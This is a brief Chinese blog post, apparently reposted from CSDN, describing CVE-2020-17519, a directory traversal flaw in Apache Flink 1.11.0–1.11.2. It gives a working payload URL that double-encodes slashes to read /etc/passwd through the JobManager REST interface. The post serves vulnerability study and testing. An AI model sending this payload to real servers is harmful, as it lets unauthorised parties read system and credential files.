Apache Flink目录穿越漏洞(CVE-2020-17519 )

本文阅读 1 分钟

Apache Flink 1.11.0中引入的更改,允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。但是访问仅限于JobManager进程可访问的文件。

影响版本:
1.11.0、1.11.1、1.11.2
Payload:
192.168.198.132:8081/#/job-manager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

对/进行二次编码%252f img

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/sycamorelg/article/details/117732576
-- 展开阅读全文 --
Web安全—逻辑越权漏洞(BAC)
« 上一篇 03-13
Redis底层数据结构--简单动态字符串
下一篇 » 04-10

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复